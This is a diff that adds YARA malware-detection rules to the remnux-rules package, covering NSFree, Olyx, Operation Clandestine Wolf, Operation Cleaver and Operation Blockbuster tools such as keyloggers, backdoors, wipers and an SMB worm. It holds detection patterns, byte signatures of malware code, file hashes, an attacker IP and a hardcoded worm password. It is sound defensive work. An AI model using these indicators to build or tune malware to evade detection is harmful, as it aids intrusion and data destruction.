--- remnux-rules-0.0.3/yara/malware/NSFree.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/NSFree.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NSFreeCode : NSFree Family 
+{
+    meta:
+        description = "NSFree code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+    
+    strings:
+        // push vars then look for MZ
+        $ = { 53 56 57 66 81 38 4D 5A }
+        // nops then look for PE\0\0
+        $ = { 90 90 90 90 81 3F 50 45 00 00 }
+    
+    condition:
+        all of them
+}
+
+rule NSFreeStrings : NSFree Family
+{
+    meta:
+        description = "NSFree Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    strings:
+        $ = "\\MicNS\\" nocase
+        $ = "NSFreeDll" wide ascii
+        // xor 0x58 dos stub
+        $ = { 0c 30 31 2b 78 28 2a 37 3f 2a 39 35 78 3b 39 36 36 37 }
+        
+    condition:
+       any of them
+}
+
+rule NSFree : Family
+{
+    meta:
+        description = "NSFree"
+        author = "Seth Hardy"
+        last_modified = "2014-06-24"
+        
+    condition:
+        NSFreeCode or NSFreeStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Olyx.yar remnux-rules-0.0.4/yara/malware/Olyx.yar
--- remnux-rules-0.0.3/yara/malware/Olyx.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Olyx.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule OlyxCode : Olyx Family 
+{
+    meta:
+        description = "Olyx code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $six = { C7 40 04 36 36 36 36 C7 40 08 36 36 36 36 }
+        $slash = { C7 40 04 5C 5C 5C 5C C7 40 08 5C 5C 5C 5C }
+        
+    condition:
+        any of them
+}
+
+rule OlyxStrings : Olyx Family
+{
+    meta:
+        description = "Olyx Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "/Applications/Automator.app/Contents/MacOS/DockLight"
+       
+    condition:
+        any of them
+}
+
+rule Olyx : Family
+{
+    meta:
+        description = "Olyx"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        OlyxCode or OlyxStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/OpClandestineWolf.yar remnux-rules-0.0.4/yara/malware/OpClandestineWolf.yar
--- remnux-rules-0.0.3/yara/malware/OpClandestineWolf.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/OpClandestineWolf.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,52 @@
+rule OpClandestineWolf
+
+{
+ 
+   meta:
+        alert_severity = "HIGH"
+        log = "false"
+        author = "NDF"
+        weight = 10
+        alert = true
+        source = " https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html"
+        version = 1
+	date = "2015-06-23"
+	description = "Operation Clandestine Wolf signature based on OSINT from 06.23.15"
+	hash0 = "1a4b710621ef2e69b1f7790ae9b7a288"
+	hash1 = "917c92e8662faf96fffb8ffe7b7c80fb"
+	hash2 = "975b458cb80395fa32c9dda759cb3f7b"
+	hash3 = "3ed34de8609cd274e49bbd795f21acc4"
+	hash4 = "b1a55ec420dd6d24ff9e762c7b753868"
+	hash5 = "afd753a42036000ad476dcd81b56b754"
+	hash6 = "fad20abf8aa4eda0802504d806280dd7"
+	hash7 = "ab621059de2d1c92c3e7514e4b51751a"
+	hash8 = "510b77a4b075f09202209f989582dbea"
+	hash9 = "d1b1abfcc2d547e1ea1a4bb82294b9a3"
+	hash10 = "4692337bf7584f6bda464b9a76d268c1"
+	hash11 = "7cae5757f3ba9fef0a22ca0d56188439"
+	hash12 = "1a7ba923c6aa39cc9cb289a17599fce0"
+	hash13 = "f86db1905b3f4447eb5728859f9057b5"
+	hash14 = "37c6d1d3054e554e13d40ea42458ebed"
+	hash15 = "3e7430a09a44c0d1000f76c3adc6f4fa"
+	hash16 = "98eb249e4ddc4897b8be6fe838051af7"
+	hash17 = "1b57a7fad852b1d686c72e96f7837b44"
+	hash18 = "ffb84b8561e49a8db60e0001f630831f"
+	hash19 = "98eb249e4ddc4897b8be6fe838051af7"
+	hash20 = "dfb4025352a80c2d81b84b37ef00bcd0"
+	hash21 = "4457e89f4aec692d8507378694e0a3ba"
+	hash22 = "48de562acb62b469480b8e29821f33b8"
+	hash23 = "7a7eed9f2d1807f55a9308e21d81cccd"
+	hash24 = "6817b29e9832d8fd85dcbe4af176efb6"
+
+   strings:
+	$s0 = "flash.Media.Sound()"
+	$s1 = "call Kernel32!VirtualAlloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40)"
+	$s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
+	$s3 = "NetStream"
+
+	condition:
+		all of them
+}
+
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Opcleaver.yar remnux-rules-0.0.4/yara/malware/Opcleaver.yar
--- remnux-rules-0.0.3/yara/malware/Opcleaver.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Opcleaver.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,335 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule OPCLEAVER_BackDoorLogger
+{
+	meta:
+		description = "Keylogger used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "BackDoorLogger"
+		$s2 = "zhuAddress"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_Jasus
+{
+	meta:
+		description = "ARP cache poisoner used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "pcap_dump_open"
+		$s2 = "Resolving IPs to poison..."
+		$s3 = "WARNNING: Gateway IP can not be found"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_LoggerModule
+{
+	meta:
+		description = "Keylogger used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "%s-%02d%02d%02d%02d%02d.r"
+		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_NetC
+{
+	meta:
+		description = "Net Crawler used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "NetC.exe" wide
+		$s2 = "Net Service"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_ShellCreator2
+{
+	meta:
+		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "ShellCreator2.Properties"
+		$s2 = "set_IV"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_SmartCopy2
+{
+	meta:
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "SmartCopy2.Properties"
+		$s2 = "ZhuFrameWork"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_SynFlooder
+{
+	meta:
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+		$s2 = "your target’s IP is : %s"
+		$s3 = "Raw TCP Socket Created successfully."
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_TinyZBot
+{
+	meta:
+		description = "Tiny Bot used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "NetScp" wide
+		$s2 = "TinyZBot.Properties.Resources.resources"
+		$s3 = "Aoao WaterMark"
+		$s4 = "Run_a_exe"
+		$s5 = "netscp.exe"
+		$s6 = "get_MainModule_WebReference_DefaultWS"
+		$s7 = "remove_CheckFileMD5Completed"
+		$s8 = "http://tempuri.org/"
+		$s9 = "Zhoupin_Cleaver"
+	condition:
+		(($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9)
+}
+
+rule OPCLEAVER_ZhoupinExploitCrew
+{
+	meta:
+		description = "Keywords used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "zhoupin exploit crew" nocase
+		$s2 = "zhopin exploit crew" nocase
+	condition:
+		1 of them
+}
+
+rule OPCLEAVER_antivirusdetector
+{
+	meta:
+		description = "Hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_csext
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "COM+ System Extentions"
+		$s2 = "csext.exe"
+		$s3 = "COM_Extentions_bin"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_kagent
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "kill command is in last machine, going back"
+		$s2 = "message data length in B64: %d Bytes"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_mimikatzWrapper
+{
+	meta:
+		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "mimikatzWrapper"
+		$s2 = "get_mimikatz"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_pvz_in
+{
+	meta:
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
+		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_pvz_out
+{
+	meta:
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Network Connectivity Module" wide
+		$s2 = "OSPPSVC" wide
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_wndTest
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "[Alt]" wide
+		$s2 = "<< %s >>:" wide
+		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhCat
+{
+	meta:
+		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
+		$s2 = "ABC ( A Big Company )" wide fullword
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhLookUp
+{
+	meta:
+		description = "Hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "zhLookUp.Properties"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhmimikatz
+{
+	meta:
+		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "MimikatzRunner"
+		$s2 = "zhmimikatz"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_Parviz_Developer
+{
+	meta:
+		description = "Parviz developer known from Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Florian Roth"
+		score = "70"
+	strings:
+		$s1 = "Users\\parviz\\documents\\" nocase
+	condition:
+		$s1 
+}
+
+rule OPCLEAVER_CCProxy_Config
+{
+	meta:
+		description = "CCProxy config known from Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Florian Roth"
+		score = "70"
+	strings:
+		$s1 = "UserName=User-001" fullword ascii
+		$s2 = "Web=1" fullword ascii
+		$s3 = "Mail=1" fullword ascii
+		$s4 = "FTP=0" fullword ascii
+		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
+	condition:
+		all of ($s*) or $x1 
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/cert_wiper.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/cert_wiper.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/cert_wiper.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/cert_wiper.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,262 @@
+// From CERT report https://www.us-cert.gov/ncas/alerts/TA14-353A
+rule SMB_Worm_Tool
+{
+	
+	strings:	
+		$STR1 = "Global\\FwtSqmSession106829323_S-1-5-19"
+		$STR2 = "EVERYONE"
+		$STR3 = "y0uar3@s!llyid!07,ou74n60u7f001"
+		$STR4 = "\\KB25468.dat" 
+	
+	condition:
+		( uint16(0) == 0x5A4D or 
+		  uint16(0) == 0xCFD0 or 
+		  uint16(0) == 0xC3D4 or 
+		  uint32(0) == 0x46445025 or 
+		  uint32(1) == 0x6674725C) 
+		and all of them
+}
+ 
+
+rule Lightweight_Backdoor1
+{
+
+	strings:
+		$STR1 = "NetMgStart"
+		$STR2 = "Netmgmt.srg"
+		
+	condition:
+		(uint16(0) == 0x5A4D) and all of them
+}
+ 
+
+rule LightweightBackdoor2
+{
+	strings:
+		$STR1 = "prxTroy" ascii wide nocase
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
+ 
+
+rule LightweightBackdoor3
+{
+	
+	strings:
+		$strl  = { C6 45 E8 64 C6 45 E9 61 C6 45 EA 79 C6 45 EB 69 C6 45 EC 70 C6 45 ED 6D C6 45 EE 72 C6 45 EF 2E C6 45 F0 74 C6 45 F1  62 C6 45 F2 6C } // 'dayipmr.tbl' being moved to ebp
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
+ 
+
+rule LightweightBackdoor4
+{
+	strings:	
+		$strl  = { C6 45 F4 61 C6 45 F5 6E C6 45 F6 73 C6 45 F7 69 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 } // 'ansi.nls' being moved to ebp
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
+ 
+
+rule LightweightBackdoor5
+{
+	strings:
+		$strl  = { C6 45 F4 74 C6 45 F5 6C C6 45 F6 76 C6 45 F7 63 C6 45 F8 2E C6 45 F9 6E C6 45 FA 6C C6 45 FB 73 } // 'tlvc.nls' being moved to ebp
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
+ 
+
+rule LightweightBackdoor6
+{
+	strings:
+		$STR1 = { 8A 10 80 ?? 4E 80 ?? 79 88 10}
+		$STR2 = { 8A 10 80?? 79 80 ?? 4E 88 10}
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
+ 
+
+rule ProxyTool1
+{
+	strings:
+		$STR1 = "pmsconfig.msi" wide
+		$STR2 = "pmslog.msi" wide
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them
+}
+ 
+
+rule ProxyTool2
+{
+strings:
+	$STR1 = { 82 F4 DE D4 D3 C2 CA F5 C8 C8 D3 82 FB F4 DE D4 D3 C2 CA 94 95 FB D4 D1 C4 CF C8 D4 D3 89 C2 DF C2 87 8A CC 87 00 } // '%SystemRoot%\System32\svchost.exe -k' xor A7
+
+condition:
+	(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
+ 
+
+rule ProxyTool3
+{
+	strings:
+		$STR2 = {8A 04 17 8B FB 34 A7 46 88 02 83 C9 FF}
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $STR2
+}
+ 
+
+rule DestructiveHardDriveTool1
+{
+	strings:
+		$str0= "MZ"
+		$str1 = {c6 84 24 ?? ( 00 | 01 ) 00 00 }
+		$xorInLoop = { 83 EC 20 B9 08 00 00 00 33 D2 56 8B 74 24 30 57 8D 7C 24 08 F3 A5 8B 7C 24 30 85 FF 7E 3A 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 88 5C 0C 0D 49 83 F9 FF 7F F2 42 88 44 24 0C 3B D7 7C D0 5B 5F 5E 83 C4 20 C3 }
+	
+	condition:
+		$str0 at 0 and $xorInLoop and #str1 > 300
+}
+
+/*
+rule DestructiveTargetCleaningTool1
+{
+	strings:
+		$s1  = {d3000000 [4] 2c000000 [12] 95000000 [4] 6a000000 [8] 07000000}
+	
+	condition:
+		(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
+}
+ */
+
+rule DestructiveTargetCleaningTool2
+{
+	strings:
+		$secureWipe = { 83 EC 34 53 55 8B 6C 24 40 56 57 83 CE FF 55 C7 44 24 2C D3 00 00 00 C7 44 24 30 2C 00 00 00 89 74 24 34 89 74 24   38 C7 44 24 3C 95 00 00 00 C7 44 24 40 6A 00 00 00 89 74 24 44 C7 44 24 14 07 00 00 00 FF 15 ?? ?? ?? ?? 3B C6 89 44 24 1C 0F 84 (D8 | d9) 01 00 00 33 FF 68 00 00 01 00 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF 89 5C 24 14 0F 84 (BC | BD) 01 00 00 8B 44 24 1C A8 01 74 0A 24 FE 50 55 FF 15 ?? ?? ?? ?? 8B 44 24 4C 2B C7 74 20 48 74 0F 83 E8 02 75 1C C7 44 24 10 03 00 00 00 EB 12 C7 44 24 10 01 00 00 00 89 74 24 28 EB 04 89 7C 24 10 8B 44 24 10 89 7C 24 1C 3B C7 0F 8E ( 5C | 5d ) 01 00 00 8D 44 24 28 89 44 24 4C EB 03 83 CE FF 8B 4C 24 4C 8B 01 3B C6 74 17 8A D0 B9 00 40 00 00 8A F2 8B FB 8B C2 C1 E0 10 66 8B C2 F3 AB EB ( 13 | 14) 33 F6 (E8 | ff 15) ?? ?? ?? ?? 88 04 1E 46 81 FE 00 00 01 00 7C ( EF | ee) 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 C0 55 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 0F 84 FA 00 00 00 8D 44 24 20 50 56 FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 6A 02 6A 00 6A FF 56 FF D5 8D 4C 24 18 6A 00 51 6A 01 53 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 8B 44 24 24 8B 54 24 20 33 FF 33 DB 85 C0 7C 5A   7F 0A 85 D2 76 54 EB 04 8B 54 24 20 8B CA BD 00 00 01 00 2B CF 1B C3 85 C0 7F 0A 7C 04 3B CD 73 04 2B D7 8B EA 8B 44 24 14 8D 54 24 18 6A 00 52 55 50 56 FF 15 ?? ?? ?? ?? 8B 6C 24 18 8B 44 24 24 03 FD 83 D3 00 3B D8 7C BE 7F 08 8B 54 24 20 3B FA 72 B8 8B 2D ?? ?? ?? ?? 8B 5C 24 10 8B 7C 24 1C 8D 4B FF 3B F9 75 17 56 FF 15 ?? ?? ?? ?? 6A 00 6A 00 6A 00 56 FF D5 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 4C 24 4C 8B 6C 24 48 47 83 C1 04 3B FB 8B 5C 24 14 89 7C 24 1C 89 4C 24 4C 0F 8C ( AE | AD) FE FF FF 6A 00 55 E8 ?? ?? ?? ?? 83 C4 08 53 FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 83 C4 34 C3 }
+	
+	condition:
+		$secureWipe
+}
+ 
+
+rule DestructiveTargetCleaningTool3
+{
+	
+	strings:
+		$S1_CMD_Arg = "/install" fullword
+		$S2_CMD_Parse= "\"%s\"  /install \"%s\"" fullword
+		$S3_CMD_Builder= "\"%s\"  \"%s\" \"%s\" %s" fullword
+	
+	condition:
+		all of them
+}
+ 
+
+rule DestructiveTargetCleaningTool4
+{
+
+	strings:
+		$BATCH_SCRIPT_LN1_0 = "goto x" fullword
+		$BATCH_SCRIPT_LN1_1 = "del" fullword
+		$BATCH_SCRIPT_LN2_0 = "if exist" fullword
+		$BATCH_SCRIPT_LN3_0 = ":x" fullword
+		$BATCH_SCRIPT_LN4_0 = "zz%d.bat" fullword
+	
+	condition:
+		(#BATCH_SCRIPT_LN1_1 == 2) and all of them
+}
+ 
+
+rule DestructiveTargetCleaningTool5
+{
+	strings:
+		$MCU_DLL_ZLIB_COMPRESSED2 = { 5C EC AB AE 81 3C C9 BC D5 A5 42 F4 54 91 04 28 34 34 79 80 6F 71 D5 52 1E 2A 0D }
+	
+	condition:
+		$MCU_DLL_ZLIB_COMPRESSED2
+}
+ 
+
+rule DestructiveTargetCleaningTool6
+{
+	strings:
+		$MCU_INF_StartHexDec = {010346080A30D63633000B6263750A5052322A00103D1B570A30E67F2A00130952690A503A0D2A000E00A26E15104556766572636C7669642E657865}
+		$MCU_INF_StartHexEnc = {6C3272386958BF075230780A0A54676166024968790C7A6779588F5E47312739310163615B3D59686721CF5F2120263E1F5413531F1E004543544C55}
+	
+	condition:
+		$MCU_INF_StartHexEnc or $MCU_INF_StartHexDec
+}
+ 
+
+rule DestructiveTargetCleaningTool7
+{
+	strings:
+		$a = "SetFilePointer"
+		$b = "SetEndOfFile"
+		$c = {75 17 56 ff 15 ?? ?? ?? ?? 6a 00 6a 00 6a 00 56 ff D5 56 ff 15 ?? ?? ?? ?? 56}
+	
+	condition:
+		(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and all of them
+}
+ 
+
+rule DestructiveTargetCleaningTool8
+{
+	strings:
+		$license = {E903FFFF820050006F007200740069006F006E007300200063006F007000790072006900670068007400200052006F006200650072007400200064006500200042006100740068002C0020004A006F007200690073002000760061006E002000520061006E007400770069006A006B002C002000440065006C00690061006E000000000000000250000000000A002200CE000800EA03FFFF8200}
+		$PuTTY= {50007500540054005900}
+	
+	condition:
+		(uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $license and not $PuTTY
+}
+ 
+rule Malwareusedbycyberthreatactor1
+{
+	strings:
+		// vvv---- this sig hits on a legit CRT function it seems. 
+		$heapCreateFunction_0 = {33C06A003944240868001000000F94C050FF15????????85C0A3???????07436E893FEFFFF83F803A3???????0750D68F8030000E8??00000059EB0A83F8027518E8????000085C0750FFF35???????0FF15???????033C0C36A0158C3}
+		
+		$heapCreateFunction = { 55 8B EC B8 2C 12 00 00 E8 ?? ?? FF FF 8D 85 68 FF FF FF 53 50 C7 85 68 FF FF FF 94 00 00 00 FF 1? ?? ?? ?? ?0 85 C0 74 1A 83 BD 78 FF FF FF 02 75 11 83 BD 6C FF FF FF 05 72 08 6A 01 58 E9 02 01 00 00 8D 85 D4 ED FF F6 89 01 00 00 05 06 8? ?? ?? ?? 0F F1 5? ?? ?? ?? 08 5C 00 F8 4D 00 00 00 03 3D B8 D8 DD 4E DF FF F3 89 DD DF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 5D 4E DF FF F6 A1 65 06 8? ?? ?? ?? 0E 8? ?? ?0 00 08 3C 40 C8 5C 07 50 88 D8 5D 4E DF FF FE B4 98 D8 56 4F EF FF F6 80 40 10 00 05 05 3F F1 5? ?? ?? ?? 03 89 D6 4F EF FF F8 D8 D6 4F EF FF F7 41 38 A0 13 C6 17 C0 83 C7 A7 F0 42 C2 08 80 14 13 81 97 5E D8 D8 56 4F EF FF F5 08 D8 5D 4E DF FF F5 0E 8? ?? ?? ?? ?5 95 93 BC 37 43 E6 A2 C5 0E 8? ?? ?? ?? ?5 93 BC 35 97 43 04 08 BC 83 81 87 40 E8 03 93 B7 50 48 81 9E B0 14 13 81 97 5F 26 A0 A5 35 0E 8? ?? ?0 00 08 3C 40 C8 3F 80 27 41 D8 3F 80 37 41 88 3F 80 17 41 38 D4 5F C5 0E 89 8F EF FF F8 07 DF C0 65 91 BC 08 3C 00 35 BC 9C}
+		
+  	// vvv---- this sig hits on a legit CRT function it seems. 
+		$getMajorMinorLinker = {568B7424086A00832600FF15???????06681384D5A75148B483C85C9740D03C18A481A880E8A401B8846015EC3}
+
+		$openServiceManager = {FF15???0?0?08B?885??74????????????????5?FF15???0?0?08B?????0?0?08BF?85F?74}
+	
+	condition:
+	
+		all of them
+}
+
+
+rule Malwareusedbycyberthreatactor2
+{
+	strings:
+		$str1 = "_quit"
+		$str2 = "_exe"
+		$str3 = "_put"
+		$str4 = "_got"
+		$str5 = "_get"
+		$str6 ="_del"
+		$str7 = "_dir"
+		$str8 = { C7 44 24 18 1F F7}
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0  or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
+ 
+
+rule Malwareusedbycyberthreatactor3
+{
+	strings:
+		$STR1 = { 50 68 80 00 00 00 68 FF FF 00 00 51 C7 44 24 1C 3a 8b 00 00 }
+	
+	condition:
+		(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/DeltaCharlie.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/DeltaCharlie.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/DeltaCharlie.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/DeltaCharlie.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,14 @@
+import "pe"
+
+rule DeltaCharlie
+{
+	meta:
